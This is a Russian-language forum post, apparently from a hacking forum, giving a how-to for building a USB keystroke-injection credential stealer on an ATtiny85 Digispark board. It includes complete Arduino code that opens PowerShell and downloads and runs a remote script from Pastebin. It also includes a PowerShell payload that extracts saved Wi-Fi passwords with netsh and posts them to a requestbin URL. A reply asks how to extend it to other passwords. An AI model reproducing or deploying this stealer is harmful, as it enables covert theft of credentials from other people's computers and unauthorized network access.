USB-стиллер

zodiak

Пользователь
Регистрация
11.12.16
Сообщения
235
Реакции
191
Баллы
63
Нарушения
0 / 5
Делаем сами: USB-стиллер


Здесь у нас гайд по созданию стиллера на attiny85. Очень дешевая вещица, но при должном подходе позволяет сэкономить сэкономить себе ~50 долларов. Сравним с тем же функционалом на RUBBER DUCKY.


Вот вам и разница:

6d0a0ab6bfa79eb41bd9f.png

cb342b781025b9f44a166.png


Начнем по традиции с установки нужных приложений на наш ПК.
Скачали, устанавливаем.

Первое, что нам необходимо - Arduino ide.

Дальше по пунктам.

1. Заходим в "Файл - Настройки"

618175616f077e1ba9926.png

2. Находим нужную строчку.

20d03326adfbb778e35ec.png

Вставляем данную ссылку - http://digistump.com/package_digistump_index.json

4. Находим "Менеджер плат"

c33cda4312651e65cd2ac.png

Копируем туда "Digistump AVR Boards", нажимаем "More info" и жмем "Install" (на скриншоте результат установки). Дожидаемся конца установки.

75a761405a92d7fd92b6b.png

5. Снова ищем Настройки, находим пункт "Другие настройки можно редактировать непосредственно в файле" нам нужно открыть строку куда мы впишем наш путь. В нужной строчке дописываем "\packages\digistump\hardware\avr\1.6.7\libraries\DigisparkKeyboard". Находим файл DigiKeyboard.h и открываем его блокнотом.

Туда, где коды клавиш дописываем это:

#define KEY_ENTER 40

#define KEY_SPACE 44

#define KEY_SINGLEQ 49

#define KEY_COLON 55

#define KEY_HYPHEN 56

#define KEY_DELETE 76

Сохраняем, закрываем.

В самом ардуино снова находим платы, и выбираем - Digispark (Default – 16.6 mhz).

Все нужное мы настроили.



Подключаем возможность красть пароли от Wi-Fi с компьютера.
Ориентировано под Windows.

Заходим на реквестбин. Создаем новую "корзинку".

0f967713aa1cdb0a2d4a4.png

Копируем ее ссылку (не из адресной строки с ?inspect, а ту, что будет посередине экрана). Ссылку советую сохранить в текстовом документе.

Заходим на pastebin. ОБЯЗАТЕЛЬНО регистрируемся.

Создаем "пасту"

4056be2d758cebada36e5.png

Вставляем данный код:

$wifi_ru=(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Содержимое ключа\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize
$wifi_en=(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "key\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize
$url="https://requestb.in/zz0nzqzz"
$wifi_ru
$wifi_ru | Out-File tmp.txt
$data=Get-Content .\tmp.txt
$data
Invoke-RestMethod -Method Post -Uri $url -Body $data
Remove-Item -Path shellcode.txt
Set-Clipboard -Value "Your computer was fucked up!"
clear
exit





90ce658dd10c6cbda7811.png

После всех манипуляций кликаем на кнопку указанную стрелкой.

И копируем ссылку на то, что в итоге получилось. Результат тоже сохраните в текстовом документе.

Далее создаем ещё одну "пасту". В нее пишем это:

$source = "ВАША ССЫЛКА НА ПАСТУ"
$destination = "shellcode.txt"
$web = New-Object System.Net.WebClient
$web.DownloadFile($source, $destination)
$file = Get-Content -Path $destination -Encoding UTF8
Set-Clipboard -Value $file





Надеюсь вы правильно поняли что писать туда где указано "ВАША ССЫЛКА НА ПАСТУ". Если не поняли то туда вставляется то, что в текстовом файле вы сохранили вторым.

Здесь тоже нужно кликать на RAW, и ссылку в снова в текстовик.

После этого открываем ардуино, и копируем в него код:

#include "DigiKeyboard.h"

void setup() {
DigiKeyboard.update();
}

void loop() {
delay(1000);
DigiKeyboard.update();
delay(100);

// meta+r, delete content, start powershell
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // meta+r
delay(100);
DigiKeyboard.sendKeyStroke(KEY_DELETE); // Clean it up
delay(50);
DigiKeyboard.println("powershell");
delay(200);
DigiKeyboard.println("iex (New-Object Net.WebClient).DownloadString(\"ССЫЛКА НА ВТОРУЮ ПАСТУ\")");
delay(3000);
DigiKeyboard.sendKeyStroke(KEY_V, MOD_CONTROL_LEFT);
delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
delay(900000);
}





Да, на месте "ССЫЛКА НА ВТОРУЮ ПАСТУ" копируем сслыку на последнюю созданную пасту.

Seems like" это. Нажимаем как указано.

95bc8c64b2f271917f8cb.png


Следим за консолью внизу. После появления надписи со скрина ниже - вставляем attiny85 в порт USB.

0dc32e5e93baa53070896.png


Как увидите данное сообщение - красавчики. Не увидели - пробуйте еще раз.

ab7eeca87d6d3b7555178.png


P.S. Когда вставите в ПК устройство, проверяйте раскладку клавиатуры. Работает только при английском языке. А все пароли от wi-fi отправятся на ваш реквестбин, который был создан. Найдете их в корзинке на главной странице реквестбина.

Пользуйтесь, мужчины.
 
Привет, а это только под wi-fi? а как под остальные пароли настроить её?
 
Назад
Верх Низ